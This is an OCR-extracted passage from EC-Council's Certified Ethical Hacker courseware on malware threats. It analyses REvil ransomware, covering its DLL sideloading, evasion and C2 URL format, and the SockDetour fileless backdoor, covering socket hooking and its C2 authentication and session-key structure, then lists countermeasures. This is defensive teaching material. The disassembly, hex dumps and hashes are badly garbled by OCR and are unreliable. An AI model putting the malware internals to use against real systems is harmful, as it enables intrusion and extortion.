4 03 00 oo 00 oo 72 20 2E EL cea 7c ES EO EO oo oo 00 oo oo 00 03 00 85 00 88 00 00 40 68 00 74 oo 20 oo 00 61 oo 40 oo oo 00 oo oo 00 oo oo 00 00 oo 00 00 oo 00 00 oo 00 00 oo 00 00
5 00 00 00 00 Ba 6F 22 oD 13 13 19 13 13 19 a0 00 OE 10 02 00 09 10 oo 09 15 a0 09 00 o1 00 00 04 00 20 oo 00 BC 00 30 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 00 00 00 00 00
6 00 00 00 0 09 67 75 op Ba Ba Ba Ba Ba Ba 00 oo 07 00 00 00 40 0 00 00 00 00 00 00 00 00 00 00 00 07 00 00 09 00 oc 00 00 00 0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
7 00 00 00 00 fo] 72 6E oA Ds DS DS Ds Ds DS 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 co 0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
A cry 40 oo 00 21 61 20 24 El a? 54 El EC 52 50 a0 00 oo os 00 00 oo 18 a0 oo 00 00 oo 00 00 42 00 2E oo 00 00 00 2E oo oo 00 00 oo 00 oo 00 00 00 00 00 oo oo 00 00 00 00 00 00 00 00
9
00 00 00 00 BB 6D 69 00 19 48
A
00 00 00 00 01 20 6E 00 B4 6B
BC
00 00 00 00 4C 63 20 00 DS DS
DE
F | Ascii
FF 00 00 E8 CD 61 44 00 E1 FB
FF 00 O0 00 21 6E 4F 00 19 19
8B
19 B4 DS
00 o0 oo O0 54 6E 63 00 B4 Bé
00 oo oo 00 68 6F 20 00 DS DS
[MZ .¢..J...¥y @ é | on. °.1!, LI!Th | is. program.canno | tbe.run. in. DOS | node 6 pdt’ | Fx % | SHUOE
ra 87 54 DS AB 18 B4 DS | SHTO|b’OTITOcct’
19 BS DS
4B 69 45 00 68 20 00 AO 00 00 Co 00 30 00 00 00 00 00 OD 00 72 AA 00 5C 00 72 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
68 63 00 00 05 07 01 OC 10 00 09 00 OC 00 00 00 00 00 07 00 64 02 00 02 00 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
DS 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 00 00 00 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
EO El 4c EO 00 00 00 00 00 10 50 oO 00 00 oO G0 00 00 00 00 74 00 40 00 00 6F 00 40 00 00 00 00 00 O0 00 00 OO 00 00 OO 00 00 OO 00 00 OO 00 00
19 19 01 00 00 00 O00 04 10 00 00 00 61 00 00 00 0 0 10 00 61 12 00 DO 00 63 Dc 00 00 00 0 0 00 00 0 00 0 0 00 a0 0 0 0 0 00 0 O0 0
B4 B4 04 02 00 00 O06 00 O09 00 00 O09 00 00 O09 00 00 O9 00 00 00 07 00 09 00 00 OB 00 00 00 O90 00 Oo O90 00 00 O90 00 00 O90 00 00 O90 00 00 O90 00 00
DS DS 00 21 00 10 Oo 00 00 00 00 O90 00 00 00 09 00 o0 00 00 00 00 40 00 00 00 00 42 00 oD oo 00 0D 00 oO oD 00 00 00 00 00 00 o0 00 00 00 00 00
| éa'det OabyOut’
| ikUOal’OikhOst’ is] | ikjOat‘ORichd}’ 6 PE..L4 |3-¥ ani |e | ei | + | I wa Pee t+ +. 4 + | ¢..4..-1A.-P | >be. Ons | Pi. | | | |
@ oh ‘text. Ble. 4 fe. 4 ‘indata Jay... 8). 10 @..@ data yD 42M .a...08..b... ter eB
Figure 7.126: agent.exe resources
These two components are dumped into the Windows folder in the form of MsMpEng.exe and mpsve.dil. While the first resource can be a simple defender binary, the second (mpsve.di1) is an REvil encryptor binary that leads to a DLL sideloading attack. Module 07 Page 1175
| Hacking and Countermeasures Copyright © by E6-COl All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats stextrO13EL0FC ‘text :01361101 ‘eext:013€1103 Teextie13€1105 Teexeie13€1107 ‘text 01361109 Teext:0n3e110F Teextie13e1110 ‘eext:O13E1112 eextien3ei118 Teext:O13EL11A Teexts€1361120 ‘eext:01361121 ‘eextien3e1127 Teexti@13EL120 Teexti@13e1i2€ ‘text :01361130 ‘Teext:01361135 Teexti013€1137 ‘ext 201361139 ‘text 01381138 Teext:013€113¢ Teextse13e1136 ‘eext:O13E113F Teextien3e1185 Teext013E1167 Teexese1361149 eext:O13E114A Teexti0n3e1150 Teext:013E1155 Teexti@13E1isA text 13E115F Teextion3ei61 Teexti@13E1166 ‘text :013E116C Teexti@n3E1171 Teext:013€1178 Teext:@13E1170 ‘eext:O13E1184 Teexti0n3e1189 Teext0n3E118A Teexti@13€1188 ‘text 0138119 Teext:0n3e1191 Teexesen3e1192 ‘eext:01361193 Teext:@13€1196 Teext:0n3€1180 Teexti@n3ELiAl
68 68 68 FF 85 OF 50 68 FF 35 OF 50 FF 63 6A 62 3 FF 85 74 50 33 56 FF 35 74 5¢ FF 63 8A Ad 38 £5 88 6A C7 £6 C7 65 56 56 68 56 56 56 FF (7 50 FF
04 65, 00 D6 Co 84 00 15 co 64 15 14 66 08 40 06 Co 6C F6 15 co 5 15 24 88 Aa C5 9 00 DO 04 63 04 AS
1¢ 3F @1 96 00 00 00 20.00 3€ 01 8700.60.00 18 00 3€ 01 10 3F et 43 3F 01
20 00 3€ 01 18 00 1¢ 3F 55 0C 43 3F Fe FF 4043 56 00 24 38 Fe FF 24 EC 43 3F
3€ 62 00 @1 FF 3F 00 1C FF 43 01
01 @1 3F 3F
30 02 ©0 00 75 10 05 AS 43 5F 01 15 2600 3 @1
Exam 312-50 Certified Ethical Hacker
push offset Type SOF push 65h 5 plone push 0 3 edule €all esi; Findesourcel! test eax, eax © jz_— _loc 13€1147 push eax + hestnfo push } hildule alls Loadesource test eax, eax © jz Loe. 1381147 push eax 5 bResbata fall dssLockResource ooLrs' push offset attodlis push 65h 5 Apane push 8 5 biodule ov dvord_13F4340, eax €all esi; FindRescurcew test eax, eax jz short loc 1361147 Push eax. 5 Restafo yor esi, est push esi. 5 bodute fall dssLoadResource test eax, eax je short loc 1321147 push eax 5 bResbata Eel] dssLockResource push offset. atpsveD11 ==] moved, C5588 tov dword_13F4344, eax mov eck, eax Call rite File_tn_windows_folder mov eex, dword_13F43A0 mov ed, S600h 01 mov [esptdtlpProcessinformation], offset attsmpengexe call rite File In windows folder G1 mov__[esprtlpProcessInforaation], offset ProcessInformation 7 IpProcessInformation push offset startupinfo 5 Ipstartupinfo push esi 5 Apcurrentoirectory push esi } penvironsent push 230h 3 deCreationFlags push esi } binherithandles push esi } Ipthreadattributes push esi ApProcessAteributes Push [ebp#1pConmandL ine] 1pCommandLine 48 Ootmov — Startupinfo.cb, ath push eax 5 IpApplicationtiane call dssCreateProcessit Figure 7.127: Binaries dropped by agent.exe
As soon aS MpMseng.exe executes and invokes the export function (servicecrtMain), the REvil encryptor (mpsve.di1) loads and executes itself. -text:10001290 stext:10001290 text text. text: text: text: text: text: ‘text: text: text text text. text stext text text text. text: text: text: text: text: text: text text text. text text text text. text: text: text:
20 10 21 07 10 20 08 21 07 10
public Servicecrttain ServiceCrttlain proc near D vars duord ptr -8 ThreadId duord ptr -4 push —ebp. mov ebp, esp sub esp, & lea eax, [ebp+Threadtd] push eax 5 Ipthreadrd push @ 3 dwCreationFlags push 0 3 IpParameter push offset StartAddress ; IpStartaddress 5 dwStacksize push } Ipthreadattributes push call reateThread mov [ebptvar_s], eax ‘oc_10001280: 5 CODE XREF: ServiceCrtMaint34tj mov ecx, 1 test ecx, ecx jz short loc_100012¢6 push 38h 5 duttilliseconds call ds:Sleep jmp short loc_10001280 ‘oc_100012¢6: yor mov pop retn Servicecrttiain endp
5 CODE XREF: ServiceCrtaint27tj edx, eax esp, ebp ebp.
Figure 7.128: MpMseng.exe invoking ServiceCrtMain
Module 07 Page 1176
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
The REvil exploits OpenSSL to perform cryptographic activities such as file encryption.
sve sve sve sve
38 08 BC BE ro ca FS 2 BC cy 88 ca :10001588 88 CS :10001580 :10001580 :10001580 SE 1000158 C3
21 07 10 02 00 00 OE 02 00 ac 00 09 00 £8 05 00 ac
oc_10001590: push 58h push offset _aCryptoEvpEvpen push ch call near ptr unk_10002830 mov esi, eax add esp, @Ch test esi, esi jz short loc_10001580 push ch push 8 push esi call near ptr unk 1005FE40 add esp, @Ch mov eax, esi oc_10001580: pop esi retn
3 CODE XREF: mpsvc:1000101C1; 3 ".\\erypto\\evp\\evp_ene.e
5 CODE XREF: mpsvc:mpsve_SvchostPushServiceGlobals+28915
Figure 7.129: Exploiting OpenSSL
2189000 20140010 2189020 20180030 2e1A9040 2010050 20180060 20140070 20180080 20180090 2e1A0080 2@1A90c0 2@1A9000 201A00% e @ @ 2 2 2 @ 2 ° 2 @ 2 2014020 2
SRSSSSSSSASSSRSSSSSSSSSSSSSSSISES SOSSSSSSSASSSSTRISSSSSSSSSSSISSIS sssssss SRSSSSSSSSSSSSSSSES SSSSSSSSSSSSSSSSSSSSSSSSSSSSSESES SSSSSSSASSSSSSSSSASSSSSSSESSESSES SSSSSSSLSSSSSLESSSLSSSSSSSSSSSSSES SSSSSSSSSSSSSSSESSHSSSSSSSSSSSESIE ISSSSSSSSSSSSSSSSLSSSSSSSSSSSSSSIES SSSSSSSSSSSSSKSTSESSSSSSSSSSSSSEL SRSSTSSSSSSSSSSELESSSSSSSSSSSESEE SSSSSSSSSSSSSLSSRESSSSSSSSSSSESIS SSSSSSSSSSSSSSSSSSSSSSSSSSSSISIIS SSSSTSSSSSSSSSSSSSSSSSSSSSSSSSSSF SRSSSSSSSSSSSSSSLESSSSSSSSSSSESIF SSSSSSSSSSSSSESSSSSSSSSSSSSSSIESIS SSSSSSSSSSSSSSSSSSSSSSSSSSSSMSSSS
The ransomware allocates new memory and drops the actual payload using functions such as CreateFileMappingW and MapViewOfFile.
2
Figure 7.130:
Module 07 Page 1177
Actual payload
| Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Now, REvil exposes its typical ransom behavior of changing config files, changing local firewall rules, creating its own registry keys, and adding its own values to the registry keys. With all these activities, the attackers now automatically log into the victim system with their own accounts, encrypt all the victim’s confidential files, and display a ransom note, as shown in the screenshot.
Figure 7.131: Ransom note threatening the user/victim
=
Lateral Movement In targeted attacks, attackers perform PsExec tools.
=
lateral movement, for which they use RDP and
Defense Evasion and Discovery At this stage, attackers use network discovery tools such as AdFind, SharpSploit, BloodHound, and NBTScan to discover and infect other systems connected to the target network. The following techniques are used by REvil for defense evasion: o
PC Hunter and Process Hacker related to antivirus products
0
KillAV, a custom malicious binary specifically designed to uninstall antivirus products by either querying the uninstall registry and uninstalling the program associated, or by terminating processes from its list
Module 07 Page 1178
to identify and
terminate
services and
processes
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
o
Safeboot routine, which is triggered when “-smode” is supplied as an argument and creates various new variants with RunOnce registries to restart from or to Safemode and bypass security solutions
o
DLL sideloading to bypass detection by running as a legitimate file or process
o
PowerShell Defender
commands
to
compromise
the
supply
chain
and
disable
Windows
Credential Access and Exfiltration At this stage, attackers use tools such as SharpSploit, an attack framework, along with the mimikatz module to gain credential access. Further, they obtain the gathered information using different methods such as FTP transfer via FileZilla or the use of thirdparty synchronization tools such as MegaSync, FreeFileSync, and Rclone.
=
Command and Control (C2) At this stage, the REvil ransomware sends a report and system information to the attackers’ C2 server. This is performed by creating a pseudorandom URL based on the following fixed format: https://{Domain}/{String characters}.{String 3}
1}/{String
2}/{random
The domain and strings have the following meanings: Domain: String admin,
String assets, String
Module 07 Page 1179 :
from
a
list
based
1: wp-content, data, or news
2: or 3:
images, pics jpg,
png,
on
the
include,
pictures,
configuration content,
image,
temp,
uploads,
tmp,
static,
graphic,
gif
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
CEH
Fileless Malware Analysis: SockDetour
|G SockDetour is fileless malware that compromises a Windows system’s legitimate processes and builds a secure C2 communication channel @ Itcreates a stealthy backup backdoor that can continue its operation even after the primary backdoor is detached from the infected machine Legitimate with 2 listeniprocess ng port
@njon.c2 requests are directed to t original services
Legitimate service port
SockDetour Infection Flow
Ahook is bound to the ‘Winsock accept) functio
using the Detours library
@, Powersploit memory injector injects shelleode into the target's process PowerSploit [>= memory injector
‘SockDetour establishes a C2
connection with the attacker
© sockdetouris loaded DonutLoader shellcode is injected into the target's process ttps:/funit2 pateaitonet works com cerved. Reproduction is Strictly Prohibited
SockDetour Fileless Malware Attack Stages
CE H
@ SockDetour is hosted on a compromised FTP server such as network-attached storage (NAS) andis Pre-exploitation | delivered to the target process by exploiting remote code execution vulnerabilities |@ SockDetour is a customized backdoor assembled in the 64-bit PE file format Initial Infection
Exploitation
| @
Attackers use the Donut shellcode generatorto convert SockDetour's 64-bit PE file into shellcode and
then use the PowerSploit memory injectorto inject this code into the target process
|@ The backdoor uses the Microsoft Detours library package to hijack a network socket
| |@ The backdoor uses the DetourAttach() function to bind a hook to the Winsock accept() function |@ New connections to the target service’s port are forwarded to the malicious detour function definedin SockDetour
@ After verification, a remote C2 channel is established between the attacker and the target legitimate Postexploitation | process on the client’s machine st-exploitation |@ SockDetour performs socketless and fileless operations over time as the backup backdoor, even if the primary backdoor is detected and removed from the compromised machine cerved. Reproduction is Strictly Prohibited
Module 07 Page 1180
| Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
SockDetour Fileless Malware Attack Stages (Cont’d) Client Authentication and
C2 Communication After Exploitation
Plugin Loading Feature |@ Using the shared session key, the received final payload
@ SockDetour verifies and validates C2 connections
comme nner
"Cecesooeou7reransaas7
ferteoseettoneed otmonreranee? ‘ent ooe7rertea5 ene oooerreranaase
ws
woe
3
voc
CE H
data are encrypted
wont
_pookingruncs8715
@ The received payload data are encodedin the JSON format with two objects app and args after its decryption
SS
‘@ The app object holds a base 64-encoded DLL, and the args
= in
{
Se Eoptaaneue mee
i authentication ‘ication isi achieved, the malware @ Once client takes control over the TCP sessionvia the recv ()
object holds an argument set to be transferredto the DLL:
"sock": hijacked_socket, "key": session_key,
args": arguments_received_from_client s — ron
y
function without addingthe “MSG_PEEK” option
@ The plugin can interact via the hijacked socket and encrypt the TLS transactionvia the above-generated session key @ Inthis manner, SockDetour serves as a stealthy backup backdoor
@ Itgenerates a 160-bit session key through the hardcoded initial vector value bvyiafszmkjsmagl and transmits it to the remote client to encrypt the
communication over the hijacked connection
Fileless Malware Analysis: SockDetour Source: https://unit42.paloaltonetworks.com SockDetour is fileless malware that compromises a Windows system’s legitimate processes and builds a secure C2 communication channel without requiring a listening port to be open. Using SockDetour, attackers create a stealthy backup backdoor that can continue its operation even after the primary backdoor is detached from the infected machine. Owing to its socketless and fileless nature, it is difficult to detect on infected Windows servers. The malware is distributed through C2 infrastructure, i.e., a compromised FTP server that hosts ASP web shells and memory dumping tools.
ate process with a listening port
@ Non-c2 requests are directed to their
original services
Legitimate service port
Ahook is bound to the Winsock accept() function,.. using the Detours library
@ , Powersploit memory injector injects shellcode
into the target's process
SockDetour
t---;---!
SockDetour establishes a C2
connection with the attacker i |
. = DonutLoader | Shellcode
SockDetour is loaded
DonutLoader shellcode is injected into the target’s
process
Legitimate process with a listening port Figure 7.132: SockDetour infection flow
Module 07 Page 1181 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
SockDetour Fileless Malware Attack Stages Pre-exploitation SockDetour is hosted on a compromised FTP server such as network-attached storage (NAS) and is delivered to the target remote process by exploiting some common vulnerabilities such as RCE. These types of vulnerabilities allow a custom backdoor to hijack legitimate processes and network connections of a socket and create a C2 connection with remote attackers through the socket. Initial Infection SockDetour is a customized backdoor assembled in a 64-bit PE file format. It is created as a backup backdoor so that the malware remains active even if the primary backdoor is detected and removed. It mainly targets Windows OSes that run services on TCP ports. To hijack the socket of any existing process, SockDetour must be integrated with the memory of the target process. To achieve this, attackers use the Donut shellcode generator to convert SockDetour’s 64-bit PE file into shellcode. Then, using the PowerSploit memory injector, attackers inject this code into the target process. The SockDetour PE can appear as follows: Ob2b9a2ac4bff£81847b332af18a8e0705075166a137ab248e4d9b5cbd8b 960d£
The PowerSpoit code injection appears as follows: 80ed7984a42570d94cd1b6dcd8
9£95e3175a5c4247ac245c817928dd07£c9540
bee2f£e0647d0ec9f2£0aa5£784b122aaebalNcddb3 9b08e3eal 9dd4cdb90e53£9 a5b9ac1d0350341764£877£5c4249151981200d£0769a38386£6b7c8ca6£9cTa 607a2ce7dc2252e9e582e75
7bbfa2f18e3£3864cb4267cd07129£4b9a241300b
11b2b719d6bffae3ab1e0£8191d70aalbade7 £59 9aeadb7358£722458a21b530 cd28c7a63£91a20ec4045cf40££0£93b336565bd504c9534be857e971b4e80ee ebe926£37e7188a6£0cc8574437 3ea2bf2a6b039071b8
6cdc672e495607£85ba3cbee6980049951889
90£03b5987d9135f£e4c036£b77£477£1820c34b341644e
7e9cf2a2dd3edac92175a3eb1355c0£5£05£47b77
98e206b470637c5303ac79£F
bb48438e2ed47ab692d1754305d£664cda6c518754ef
9a58fb5fa8545£5bfb9b
Exploitation After SockDetour is injected into a legitimate process, the backdoor uses the Microsoft Detours library package (API calls monitoring and instrumentation) to hijack a network socket. The backdoor uses the DetourAttach() function to bind a hook to the Winsock accept() function. When new connections are initiated to the target service’s port, the Winsock accept() function is invoked, and the call to the accept() function is forwarded to the malicious detour function defined in SockDetour. Other non-C2 requests are directed connections are not interrupted. Module 07 Page 1182
to their original
services
to ensure
that those
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
Post-exploitation
All incoming requests can be hijacked by SockDetour to verify, validate, and segregate the legitimate service traffic and C2 traffic. After verification, a remote C2 channel is established between the attacker and the target legitimate process on the client machine. After successful implementation, SockDetour performs socketless and fileless operations over time as the backup backdoor, even if the primary backdoor is detected and removed from the compromised machine. Client Authentication and C2 Communication After Exploitation
The malware verifies and validates C2 connections as follows: o
The authentication
data from the client are shown
in the table below.
Initially, 137
bytes of data are expected from the client for authentication.
17 03 03
AA BB
cc pp EE FF
Fixed header value an to disguise TLS traffic
. Size of the ayload data Paylo
Four-byte variable . used for client authentication
| block 228-byte data | Data signature for oor client authentication data block
Table 7.6: Data structure of SockDetour client authentication
o
Examine the initial 9 bytes of data, which are obtained using the recv() function along with the option MSG_PEEK since it does not interrupt the legitimate service’s traffic even after discarding data from the socket queue.
o
Check if the data begin with 17 03 03, which is a commonly recorded header for TLS transactions during encrypted data transmission, which can be shown only after performing the appropriate TLS handshake.
. text :@00007FEFAB84823 000007FEFAB84823 loc_7FEFAB84823: 200007FEFAB84823 mov 000007FEFABB4829 mov 000007FEFABB482F lea 000007FEFAB84837 mov 200007FEFAB8483C call 200007FEFABB4842 mov 000007FEFABB4847 mov 000007FEFABB484C mov 000007FEFAB84851 mov 200007FEFAB84857 lea 200007FEFABB485C lea : 000007FEFABB4864 call . text :@00007FEFAB84869 test
3 CODE XREF: _hookingFunc+87tj rod, MSG_PEEK ; flags red, 9 3 len rdx, [rsp+218h+ RecvBuf] ; buf rex, [rsp+218h+s] ; s cs:recy 3 recv 9 bytes [rsp+218h+8uf2], 17h [rsp+218h+var_103], 3 [rsp+218h+var_1D2], 3 r8d, 3 3 Size rdx, [rsp+218h+Buf2] ; Buf2 rex, [rsp+218h+ RecvBuf] ; Bufl memcmp 3 data should start with 17 @3 03 eax, eax
Figure 7.133: SockDetour receiving and verifying data
o
Check if the payload data size (AA
Module 07 Page 1183
BB) is not greater than 251.
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats o
Exam 312-50 Certified Ethical Hacker
Check if the next four bytes of the payload (CC conditions: e
The result is 88
a0
90
DD
EE
FF) satisfy the following
82 after performing bitwise AND with 88
a0
90
82.
e
Theresultis fd
£5
£b
ef after performing bitwise OR with fd
£5
fb
ef.
Now, examine the complete 137 bytes of data from the same socket data queue with the option MSG_PEEK for further authentication. Then, create a 24-byte data block as shown in the table. 08 13
1c 3a
cl d7
78 Of
d4 ab
10 bytes hardcoded in SockDetour
cc
DD
EE
b3 03
FF
Four bytes received from the client for authentication
a2 e8
b8 ££
ae 3b
63
bb
10 bytes hardcoded in SockDetour
Table 7.7: Block data to be verified for client authentication
Using an embedded public key against the 128-byte data signature in the above table, the above 24-byte data block is hashed and verified. The data signature is generated by signing the hash of the same 24-byte data block through its corresponding private key. Client authentication is achieved with the above steps. Now, the malware takes control over the TCP session via the recv()
function without adding the MSG_PEEK
option
because the session is already verified for backdoor persistence. Further, SockDetour generates a 160-bit session key through a hardcoded initial vector value bvyiafszmkjsmqgl. Now, the malware transmits it to the remote client using the data structure given in the below table. 17
03
03
AA
CC
BB
FF
Fixed header alue to Payload data . y ve u . disguise TLS | size traffic
DD
EE
| Session ke Y length
:
session_key
160-bit session ' ' key
.
| random_padding
Random padding
Table 7.8 SockDetour session key sent to the client
As a result, the C2 connection can be encrypted over the hijacked socket as the session key is already shared between SockDetour and the remote client.
Module 07 Page 1184
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Plugin Loading Feature Being a backup backdoor, SockDetour can load a plugin DLL. After successful sharing of the session key, the malware receives four bytes of data from the client, where four bytes is the size of data that SockDetour receives for final payload delivery. Using the shared session key, the received final payload data are encrypted. The received payload data will be encoded in the JSON format with two objects app and args after its decryption. The app object holds a base 64-encoded DLL, and the args object holds an argument set to be transferred to the DLL. Now, the malware loads this plugin DLL into the newly allocated memory space and invokes an export function ThreadProc, along with the argument given in the following JSON structure:
{ "sock":
hijacked_socket,
"key": "args":
session_key, arguments_received_from_client
} As plugin DLL samples were not identified, the argument given above informs that the plugin can interact via the hijacked socket and encrypts the TLS transaction via the above-generated session key. In this manner, SockDetour serves as a stealthy backup backdoor.
Module 07 Page 1185
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
CEH
LO#07: Explain Malware Countermeasures
Strictly Prohibited
Malware
Countermeasures
Malware is commonly used by attackers to compromise target systems. Preventing malware from entering a system is far easier than eliminating it from an infected system.
This section presents various countermeasures that prevent malware from entering a system and minimize the risk it causes upon entry.
Module 07 Page 1186
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
CEH
Trojan Countermeasures
ze
eo
Dey
bs
Avoid opening email attachments received from unknown senders
Avoid downloading and executing applications from untrusted sources
Blockall unnecessary ports at the host and firewall
Install patches and security updates for the OS and applications
Avoid accepting programs transferred by instant messaging
Scan external USB drives and DVDs with antivirus software before using them
Harden weak, default configuration settings, and disable unused functionality including protocols and services
Restrict permissions within the desktop environmentto preventthe installation of malicious applications
Monitorthe internal network trafficfor odd ports or encrypted traffic
Run host-based antivirus, firewall, and intrusion detection software
Trojan Countermeasures Some countermeasures against Trojans are as follows: Avoid opening email attachments received from unknown senders. Block all unnecessary ports at the host and use a firewall. Avoid accepting programs transferred by instant messaging.
Harden weak default configuration settings and disable unused functionalities, including protocols and services. Monitor the internal network traffic for odd ports or encrypted traffic. Avoid downloading and executing applications from untrusted sources. Install patches and security updates for the OS and applications. Scan external USB drives and DVDs with antivirus software before using them. Restrict permissions within malicious applications.
the
desktop
environment
to prevent
the
installation
of
Avoid typing commands blindly and implementing pre-fabricated programs or scripts. Manage local workstation file integrity through checksums, auditing, and port scanning. Run host-based antivirus, firewall, and intrusion detection software.
Avoid clicking on unsolicited pop-ups and banners. Exercise caution in the use of peer-to-peer file sharing. Prefer ISPs that provide network security and have robust anti-spam techniques. Module 07 Page 1187
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
Disable the autorun option for external devices such as USB drives and hard drives.
=
Check the Secure Socket Layer (SSL) authenticity website to avoid information sniffing.
Module 07 Page 1188
before
accessing any e-commerce
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Backdoor Countermeasures
CE H
|
|
|
2 |
Educate users to avoid installing applications
3 |
Avoid untrusted software and ensure that every device is protected by a firewall
|4 |
Use antivirus tools such as Bitdefender, and Kasperskyto detect and eliminate backdoors
|
Track open-source projects that enter the enterprise from untrusted external sources, such as open-source code repositories
|
| 6 |
Most commercial antivirus products can automatically scan and detect backdoor programs before they can
cause damage
downloaded
from untrusted Internet sites and email attachments
Inspect network packets using protocol monitoring tools
Backdoor Countermeasures Some common countermeasures against backdoors are as follows: Most commercial antivirus products can programs before they can cause damage.
automatically
scan
and
detect
backdoor
Educate users to avoid installing applications downloaded from untrusted Internet sites and email attachments. Avoid untrusted software and ensure that every device is protected by a firewall. Use antivirus backdoors.
tools
such
as
Bitdefender
and
Kaspersky
to
detect
and
eliminate
Track open-source projects that enter the enterprise from untrusted external sources such as open-source code repositories. Inspect network packets using protocol monitoring tools.
If a computer is found to be infected by backdoors, restart the infected computer in the safe mode with networking. Run registry monitoring tools to find malicious registry entries added by the backdoor. Remove virus.
or uninstall the program
or application
installed by the backdoor Trojan
or
Remove the malicious registry entries added by the backdoor Trojan.
Delete malicious files related to the backdoor Trojan.
Module 07 Page 1189
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
Ensure that the device has the auto-update software-related security patches.
=
Implement the pipeline emission analysis method to check and analyze hardware-based backdoors, which can be attached during the manufacturing process.
=
Avoid using hardware components obtained from untrusted shopping sites or black markets, which allow attackers to easily inject backdoor into the hardware.
=
If any abnormal behavior is detected, reconfigure it with new credentials.
=
Check for user ratings and reviews before installing and providing permissions to any product, even if it is downloaded from trusted sources.
Module 07 Page 1190
option enabled to keep it updated
restore
the
device
to factory
settings
with
and
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hac! king and Countermeasures MalwareTI hreats
Virus and Worm
Exam 312-50 Certified Ethical Hacker
Countermeasures
|
Install antivirus software and update it regularly
Regularly maintain data backup
Generate distribute anit toantivirus the staffpolicy for safe computing and
Stay informed about the latest virus threats
Schedule regular scans for all drives after the installation
Ensure the pop-up blockers are enabled and use an
Pay attention to the instructions while downloading
Perform disk clean-up and run a registry scanner once a week
Avoid opening attachments received from unknown senders, as viruses spread via email attachments
Run anti-spyware or anti-adware once a week Pywi
Do not accept disks or programs without checking them first using a current version of an antivirus program
Do not open files with more than one file type extension
of antivirus software
Internet firewall
files or any programs from the Internet
Virus and Worm Countermeasures Some countermeasures against viruses and worms are as follows:
Install antivirus software that detects and removes infections as they occur. Generate an antivirus policy for safe computing and distribute it to the staff. Pay attention to the instructions while downloading files or programs from the Internet. Regularly update antivirus software. Avoid opening attachments received from unknown senders, as viruses spread via email
attachments.
Since virus infections can corrupt data, perform regular data backups. Schedule regular scans for all drives after the installation of antivirus software. Do not accept disks or programs without checking them using the current version of an antivirus program.
Ensure that any executable code used within the organization has been approved. Do not boot the machine with an infected bootable system disk. Stay informed about the latest virus threats. Check DVDs for virus infection. Ensure that pop-up blockers are enabled and use an Internet firewall. Perform disk clean-up and run a registry scanner once a week. Run anti-spyware or anti-adware once a week. Module 07 Page 1191
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
Do not open files with more than one file type extension.
=
Exercise caution with files sent through instant messaging applications.
=
Perform regular checkups on installed programs and stored data.
=
Employ an effective email filter and scan emails on a regular basis.
Module 07 Page 1192
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Fileless Malware Countermeasures Remove all the administrative tools and restrict access through Windows Group Policy or Windows AppLocker
Implement two-factor authentication to access critical systems or resources connected to the network
Disable PowerShell and WMI when not in use
Implement multi-layer security to detect and defend é
Disable macros and use only digitally signed, trusted macros
Run periodic antivirus scans to detect infections and keep antivirus program updated
against memory-resident malware
Install whitelisting solutions such as McAfee Application Controlto block unauthorized applications and code
6
|
CEH
running on the systems
